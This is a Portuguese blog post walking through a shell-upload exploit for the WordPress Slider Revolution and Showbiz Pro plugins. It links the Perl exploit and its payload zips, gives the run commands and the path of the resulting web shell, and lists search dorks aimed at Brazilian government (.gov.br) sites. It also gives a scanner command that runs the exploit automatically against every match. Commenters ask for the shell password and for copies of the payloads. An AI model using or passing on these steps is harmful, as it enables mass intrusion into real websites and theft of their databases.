quinta-feira, 27 de novembro de 2014

Explorando Slider Revolution/Showbiz Pro Shell Upload Exploit

Explorando Slider Revolution/Showbiz Pro Shell Upload Exploit

0x===> Slider Revolution/Showbiz Pro Shell Upload Exploit

Bom vamos lá novamente surge um bug critico em um plugin do Wordpress novamente o plugin afetado é o Slider Revolution estima-se que atualmente ele seja o plugin para slider.

[INFO INTERNA DO EXPLOIT]{
Além da vulnerabilidade LFI recentemente que foi publicado há alguns meses, esta é uma outra vulnerabilidade que os desenvolvedores não corrigiram.
Decidiram disponibilizar sem liberar um boletim de segurança completo, deixando milhares de usuários revslider que não atualizam o seu plugin para a versão mais recente (=> 3.0.96) vulnerável a esta falha desagradável, revsliders desenvolvedores irão argumentar o fato de que seu controle vem com um recurso de atualização automática, mas o problema é que este plugin é empacotado com um monte de temas, o que significa que esses temas os usuários podem não conseguir as devidas atualizações de plugins ou terá que pagar para obter a atualização. Em outras palavras desenvolvedores da revslider acredito que cada usuário deve ter o recurso de atualização automática, caso contrário ... você está ferrado.
 Obviamente, isso é muito mais importante do que a vulnerabilidade LFI, pois permite o acesso shell dando atacantes acesso ao sistema de destino bem como a capacidade para despejar todo o banco de dados wordpress localmente.
Dito isto, deve-se atualizar imediatamente para a versão mais recente ou desativar / switch para outro plugin.
Quanto Showbiz Pro, infelizmente a vulnerabilidade nunca foi criado um patched como foi explorada com sucesso na última versão (1.7.1)
}

Download:
Exploit:

Exploit update zip files:

Dependências de para uso:
Requires LWP::UserAgent
apt-get install libwww-perl
yum install libwww-perl
perl -MCPAN -e 'install Bundle::LWP'

For SSL support:
apt-get install liblwp-protocol-https-perl
yum install perl-Crypt-SSLeay

Começando a exploração

Primeiro baixaremos o exploit http://1337day.com/exploit/22938
No código do exploit encontramos dois zip's citados acima para baixar:

Exploit update zip files: http://www.morxploit.com/morxploits/revslider.zip http://www.morxploit.com/morxploits/showbiz.zip


Fazemos o download dos arquivos na mesma pasta em que o exploit.pl esteja alocado.
Mãos a obra 

0x Comando / Demo: 
  1. perl exploit.pl <target> <plugin>
  2. perl exploit.pl http://localhost revslider
  3. perl exploit.pl http://localhost showbiz
  4. perl exploit.pl http://localhost revslider



A primeira forma de explorar essa falha é pegando acesso via terminal nos dando acesso a pasta
"wp-content/plugins/__PLUGIN__/temp/update_extract/__PLUGIN__/"
 (os locais com __PLUGIN__ é o nome do plugin escolhido),
 Depois de tal processo se foi executado com sucesso apos isso é temos acesso ao terminal shell da maquina vulnerável, assim executando comandos como id,ls,wget entre outros.

A segunda maneira que o exploit nos permite obter acesso é por meio de uma webshell que fica alocada em "wp-content/plugins/__PLUGIN__/temp/update_extract/temp.php".

DORK[0] site:.gov.br inurl:/temp/update_extract/ revslider
DORK[1] site:.br inurl:/temp/update_extract/ revslider
DORK[2] site:.br inurl:/temp/update_extract/

Comando compatível com SCANNER INURLBR

./inurlbr.php --dork 'site:.gov.br inurl:/temp/update_extract/' -s wordpress.txt -q 1,6 --comand-all 'perl exploitWordpressSlide.pl http://_TARGET_ revslider'


Comando compatível com SCANNER INURLBR:   ./inurlbr.php --dork 'site:.gov.br inurl:/temp/update_extract/' -s wordpress.txt -q 1,6 --comand-all 'perl exploitWordpressSlide.pl http://_TARGET_ revslider'

OBS: Para usar tal exploits junto ao scanner inurlbr deve-se modificar tal scritp em seu banner retirando a linha 140 que contem um limpador de tela.
line 140: system(($^O eq 'MSWin32') ? 'cls' : 'clear'); 

SCANNER INURLBR BAIXAR:
https://github.com/googleinurl/SCANNER-INURLBR

3 comentários:

  1. meu inurlbr nao ta buscando no google

    ResponderExcluir
  2. Opa,

    Qual a senha pro arquivo temp.php ?

    Obrigado

    ResponderExcluir
  3. Alguém teria uma cópia para os arquivos zips?? o
    morxploit.com está offline

    ResponderExcluir

............